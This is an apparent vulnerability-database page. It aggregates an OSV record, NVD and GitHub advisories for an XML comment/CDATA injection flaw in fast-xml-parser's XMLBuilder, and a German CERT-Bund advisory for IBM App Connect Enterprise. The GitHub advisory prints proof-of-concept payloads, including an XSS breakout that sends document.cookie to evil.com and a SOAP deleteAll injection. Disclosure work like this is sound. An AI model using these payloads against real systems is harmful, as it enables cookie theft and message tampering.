"url": "https://osv.dev/vulnerability/ghsa-gh4j-gqv2-49f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jp2q-39xq-3w4g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mh29-5h37-fv8m"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pfrx-2q88-qq97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6q2-hw4h-h46w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rc47-6667-2j5j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rmvr-2pp2-xj38"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rp42-5vxx-qpwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w5hq-g745-h8pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25285"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21637"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41650"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-25285, CVE-2025-62718, CVE-2026-21637, CVE-2026-2950, CVE-2026-33750, CVE-2026-33916, CVE-2026-33937, CVE-2026-40175, CVE-2026-41650, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, ghsa-23c5-xmqv-rm74, ghsa-27v5-c462-wpq7, ghsa-2w6w-674q-4c4q, ghsa-34x7-hfp2-rc4v, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-48c2-rrv3-qjmp, ghsa-6v7q-wjvx-w8wg, ghsa-72xf-g2v4-qvf3, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-9cx6-37pm-9jff, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-fjxv-7rqg-78g4, ghsa-fvcv-3m26-pcqx, ghsa-gh4j-gqv2-49f6, ghsa-j3q9-mxjg-w52f, ghsa-jp2q-39xq-3w4g, ghsa-mh29-5h37-fv8m, ghsa-pfrx-2q88-qq97, ghsa-qffp-2rhf-9h96, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r6q2-hw4h-h46w, ghsa-rc47-6667-2j5j, ghsa-rmvr-2pp2-xj38, ghsa-rp42-5vxx-qpwr, ghsa-w5hq-g745-h8pq, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf applied in versions: 2.6.0-r1, 2.7.0-r0, 2.8.1-r0, 2.8.2-r0, 2.8.2-r1, 2.8.2-r2, 2.8.2-r3",
"upstream": [
"CVE-2025-25285",
"CVE-2025-62718",
"CVE-2026-21637",
"CVE-2026-2950",
"CVE-2026-33750",
"CVE-2026-33916",
"CVE-2026-33937",
"CVE-2026-40175",
"CVE-2026-41650",
"CVE-2026-4800",
"CVE-2026-4923",
"CVE-2026-4926",
"ghsa-23c5-xmqv-rm74",
"ghsa-27v5-c462-wpq7",
"ghsa-2w6w-674q-4c4q",
"ghsa-34x7-hfp2-rc4v",
"ghsa-3mfm-83xf-c92r",
"ghsa-3p68-rc4w-qgx5",
"ghsa-3v7f-55p6-f55p",
"ghsa-48c2-rrv3-qjmp",
"ghsa-6v7q-wjvx-w8wg",
"ghsa-72xf-g2v4-qvf3",
"ghsa-7r86-cg39-jmmj",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-8qq5-rm4j-mr97",
"ghsa-9cx6-37pm-9jff",
"ghsa-9ppj-qmqm-q256",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-chqc-8p9q-pq6q",
"ghsa-f23m-r3pf-42rh",
"ghsa-f886-m6hf-6m8v",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-fjxv-7rqg-78g4",
"ghsa-fvcv-3m26-pcqx",
"ghsa-gh4j-gqv2-49f6",
"ghsa-j3q9-mxjg-w52f",
"ghsa-jp2q-39xq-3w4g",
"ghsa-mh29-5h37-fv8m",
"ghsa-pfrx-2q88-qq97",
"ghsa-qffp-2rhf-9h96",
"ghsa-r4q5-vmmm-2653",
"ghsa-r5fr-rjxr-66jc",
"ghsa-r6q2-hw4h-h46w",
"ghsa-rc47-6667-2j5j",
"ghsa-rmvr-2pp2-xj38",
"ghsa-rp42-5vxx-qpwr",
"ghsa-w5hq-g745-h8pq",
"ghsa-xhpv-hc6g-r9c6",
"ghsa-xjpj-3mr7-gcpf"
]
}
FKIE_CVE-2026-41650
Vulnerability from fkie_nvd - Published: 2026-05-07 15:16 - Updated: 2026-06-17 10:46
Severity
Summary
fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the "-->" sequence in comment content or the "]]>" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0 | Product, Release Notes | |
| security-advisories@github.com | https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| naturalintelligence | fast-xml-parser | * |
{
"affected": [
{
"affectedData": [
{
"product": "fast-xml-parser",
"vendor": "NaturalIntelligence",
"versions": [
{
"status": "affected",
"version": "\u003c 5.7.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*",
"matchCriteriaId": "182D0133-9479-411F-A055-EABFBBF62B78",
"versionEndExcluding": "5.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the \"--\u003e\" sequence in comment content or the \"]]\u003e\" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0."
}
],
"id": "CVE-2026-41650",
"lastModified": "2026-06-17T10:46:56.607",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-41650",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-07T15:08:09.204375Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-07T15:16:07.767",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-91"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-GH4J-GQV2-49F6
Vulnerability from github – Published: 2026-04-22 20:04 – Updated: 2026-05-08 21:47
VLAI
Summary
fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters
Details
fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters
Summary
fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.
Existing CVEs for fast-xml-parser cover different issues: - CVE-2023-26920: Prototype pollution (parser) - CVE-2023-34104: ReDoS (parser) - CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder - CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities
This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.
Vulnerable Code
File: src/fxb.js
// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
// ...
if (key === this.options.commentPropName) {
return this.indentate(level) + `<!--${val}-->` + this.newLine; // VULNERABLE
}
// ...
if (key === this.options.cdataPropName) {
return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine; // VULNERABLE
}
}
Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().
Proof of Concept
Test 1: Comment Injection (XSS in SVG/HTML context)
import { XMLBuilder } from 'fast-xml-parser';
const builder = new XMLBuilder({
commentPropName: "#comment",
format: true,
suppressEmptyNode: true
});
const xml = {
root: {
"#comment": "--><script>alert('XSS')</script><!--",
data: "legitimate content"
}
};
console.log(builder.build(xml));
Output:
<root>
<!----><script>alert('XSS')</script><!---->
<data>legitimate content</data>
</root>
Test 2: CDATA Injection (RSS feed)
const builder = new XMLBuilder({
cdataPropName: "#cdata",
format: true,
suppressEmptyNode: true
});
const rss = {
rss: { channel: { item: {
title: "Article",
description: {
"#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
}
}}}
};
console.log(builder.build(rss));
Output:
<rss>
<channel>
<item>
<title>Article</title>
<description>
<![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
</description>
</item>
</channel>
</rss>
Test 3: SOAP Message Injection
const builder = new XMLBuilder({
commentPropName: "#comment",
format: true
});
const soap = {
"soap:Envelope": {
"soap:Body": {
"#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
Action: "getBalance",
UserId: "12345"
}
}
};
console.log(builder.build(soap));
Output:
<soap:Envelope>
<soap:Body>
<!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
<Action>getBalance</Action>
<UserId>12345</UserId>
</soap:Body>
</soap:Envelope>
The injected <Action>deleteAll</Action> appears as a real SOAP action element.
Tested Output
All tests run on Node.js v22, fast-xml-parser v5.5.12:
1. COMMENT INJECTION:
Injection successful: true
2. CDATA INJECTION (RSS feed scenario):
Injection successful: true
4. Round-trip test:
Injection present: true
5. SOAP MESSAGE INJECTION:
Contains injected Action: true
Impact
An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:
- XSS: Inject
<script>tags into XML/SVG/HTML documents served to browsers - SOAP injection: Modify SOAP message structure by injecting XML elements
- RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
- XML document manipulation: Break XML structure by escaping comment/CDATA context
This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).
Suggested Fix
Escape delimiters in comment and CDATA content:
// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
const safeVal = String(val).replace(/--/g, '--');
return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}
// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}
Severity
6.1 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41650"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T20:04:17Z",
"nvd_published_at": "2026-05-07T15:16:07Z",
"severity": "MODERATE"
},
"details": "# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters\n\n## Summary\n\nfast-xml-parser XMLBuilder does not escape the `--\u003e` sequence in comment content or the `]]\u003e` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.\n\nExisting CVEs for fast-xml-parser cover different issues:\n- CVE-2023-26920: Prototype pollution (parser)\n- CVE-2023-34104: ReDoS (parser)\n- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder\n- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities\n\nThis finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.\n\n## Vulnerable Code\n\n**File**: `src/fxb.js`\n\n```javascript\n// Line 442 - Comment building with NO escaping of --\u003e\nbuildTextValNode(val, key, attrStr, level) {\n // ...\n if (key === this.options.commentPropName) {\n return this.indentate(level) + `\u003c!--${val}--\u003e` + this.newLine; // VULNERABLE\n }\n // ...\n if (key === this.options.cdataPropName) {\n return this.indentate(level) + `\u003c![CDATA[${val}]]\u003e` + this.newLine; // VULNERABLE\n }\n}\n```\n\nCompare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`.\n\n## Proof of Concept\n\n### Test 1: Comment Injection (XSS in SVG/HTML context)\n\n```javascript\nimport { XMLBuilder } from \u0027fast-xml-parser\u0027;\n\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst xml = {\n root: {\n \"#comment\": \"--\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u003c!--\",\n data: \"legitimate content\"\n }\n};\n\nconsole.log(builder.build(xml));\n```\n\n**Output**:\n```xml\n\u003croot\u003e\n \u003c!----\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u003c!----\u003e\n \u003cdata\u003elegitimate content\u003c/data\u003e\n\u003c/root\u003e\n```\n\n### Test 2: CDATA Injection (RSS feed)\n\n```javascript\nconst builder = new XMLBuilder({\n cdataPropName: \"#cdata\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst rss = {\n rss: { channel: { item: {\n title: \"Article\",\n description: {\n \"#cdata\": \"Content]]\u003e\u003cscript\u003efetch(\u0027https://evil.com/\u0027+document.cookie)\u003c/script\u003e\u003c![CDATA[more\"\n }\n }}}\n};\n\nconsole.log(builder.build(rss));\n```\n\n**Output**:\n```xml\n\u003crss\u003e\n \u003cchannel\u003e\n \u003citem\u003e\n \u003ctitle\u003eArticle\u003c/title\u003e\n \u003cdescription\u003e\n \u003c![CDATA[Content]]\u003e\u003cscript\u003efetch(\u0027https://evil.com/\u0027+document.cookie)\u003c/script\u003e\u003c![CDATA[more]]\u003e\n \u003c/description\u003e\n \u003c/item\u003e\n \u003c/channel\u003e\n\u003c/rss\u003e\n```\n\n### Test 3: SOAP Message Injection\n\n```javascript\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true\n});\n\nconst soap = {\n \"soap:Envelope\": {\n \"soap:Body\": {\n \"#comment\": \"Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!--\",\n Action: \"getBalance\",\n UserId: \"12345\"\n }\n }\n};\n\nconsole.log(builder.build(soap));\n```\n\n**Output**:\n```xml\n\u003csoap:Envelope\u003e\n \u003csoap:Body\u003e\n \u003c!--Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!----\u003e\n \u003cAction\u003egetBalance\u003c/Action\u003e\n \u003cUserId\u003e12345\u003c/UserId\u003e\n \u003c/soap:Body\u003e\n\u003c/soap:Envelope\u003e\n```\n\nThe injected `\u003cAction\u003edeleteAll\u003c/Action\u003e` appears as a real SOAP action element.\n\n## Tested Output\n\nAll tests run on Node.js v22, fast-xml-parser v5.5.12:\n\n```\n1. COMMENT INJECTION:\n Injection successful: true\n\n2. CDATA INJECTION (RSS feed scenario):\n Injection successful: true\n\n4. Round-trip test:\n Injection present: true\n\n5. SOAP MESSAGE INJECTION:\n Contains injected Action: true\n```\n\n## Impact\n\nAn attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:\n\n1. **XSS**: Inject `\u003cscript\u003e` tags into XML/SVG/HTML documents served to browsers\n2. **SOAP injection**: Modify SOAP message structure by injecting XML elements\n3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout\n4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context\n\nThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).\n\n## Suggested Fix\n\nEscape delimiters in comment and CDATA content:\n\n```javascript\n// For comments: replace -- with escaped equivalent\nif (key === this.options.commentPropName) {\n const safeVal = String(val).replace(/--/g, \u0027\u0026#45;\u0026#45;\u0027);\n return this.indentate(level) + `\u003c!--${safeVal}--\u003e` + this.newLine;\n}\n\n// For CDATA: split on ]]\u003e and rejoin with separate CDATA sections\nif (key === this.options.cdataPropName) {\n const safeVal = String(val).replace(/]]\u003e/g, \u0027]]]]\u003e\u003c![CDATA[\u003e\u0027);\n return this.indentate(level) + `\u003c![CDATA[${safeVal}]]\u003e` + this.newLine;\n}\n```",
"id": "GHSA-gh4j-gqv2-49f6",
"modified": "2026-05-08T21:47:26Z",
"published": "2026-04-22T20:04:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41650"
},
{
"type": "PACKAGE",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters"
}
WID-SEC-W-2026-1654
Vulnerability from csaf_certbund - Published: 2026-05-21 22:00 - Updated: 2026-05-21 22:00Summary
IBM App Connect Enterprise: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.
Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um beliebigen Programmcode auszuführen, Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuführen, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszulösen.
Betroffene Betriebssysteme: - Sonstiges
- UNIX
- Windows
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 | ||
|
IBM App Connect Enterprise Certified Container <12.0.24
IBM / App Connect Enterprise
|
Certified Container <12.0.24 | ||
|
IBM App Connect Enterprise Certified Container <13.1.0
IBM / App Connect Enterprise
|
Certified Container <13.1.0 |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 | ||
|
IBM App Connect Enterprise Certified Container <12.0.24
IBM / App Connect Enterprise
|
Certified Container <12.0.24 | ||
|
IBM App Connect Enterprise Certified Container <13.1.0
IBM / App Connect Enterprise
|
Certified Container <13.1.0 |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 | ||
|
IBM App Connect Enterprise Certified Container <12.0.24
IBM / App Connect Enterprise
|
Certified Container <12.0.24 | ||
|
IBM App Connect Enterprise Certified Container <13.1.0
IBM / App Connect Enterprise
|
Certified Container <13.1.0 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
IBM App Connect Enterprise Certified Container <12.0.12.26
IBM / App Connect Enterprise
|
Certified Container <12.0.12.26 | ||
|
IBM App Connect Enterprise Certified Container <13.0.7.2
IBM / App Connect Enterprise
|
Certified Container <13.0.7.2 | ||
|
IBM App Connect Enterprise Certified Container <12.0.24
IBM / App Connect Enterprise
|
Certified Container <12.0.24 | ||
|
IBM App Connect Enterprise Certified Container <13.1.0
IBM / App Connect Enterprise
|
Certified Container <13.1.0 |
References
4 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Daten zu manipulieren, Cross-Site-Scripting-Angriffe durchzuf\u00fchren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszul\u00f6sen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1654 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1654.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1654 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1654"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7273703 vom 2026-05-21",
"url": "https://www.ibm.com/support/pages/node/7273703"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7273774 vom 2026-05-21",
"url": "https://www.ibm.com/support/pages/node/7273774"
}
],
"source_lang": "en-US",
"title": "IBM App Connect Enterprise: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-21T22:00:00.000+00:00",
"generator": {
"date": "2026-05-22T10:40:37.473+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1654",
"initial_release_date": "2026-05-21T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-05-21T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "Certified Container \u003c13.1.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container \u003c13.1.0",
"product_id": "T054531"
}
},
{
"category": "product_version",
"name": "Certified Container 13.1.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container 13.1.0",
"product_id": "T054531-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container__13.1.0"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container \u003c12.0.24",
"product": {
"name": "IBM App Connect Enterprise Certified Container \u003c12.0.24",
"product_id": "T054532"
}
},
{
"category": "product_version",
"name": "Certified Container 12.0.24",
"product": {
"name": "IBM App Connect Enterprise Certified Container 12.0.24",
"product_id": "T054532-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container__12.0.24"
}
}
},
{
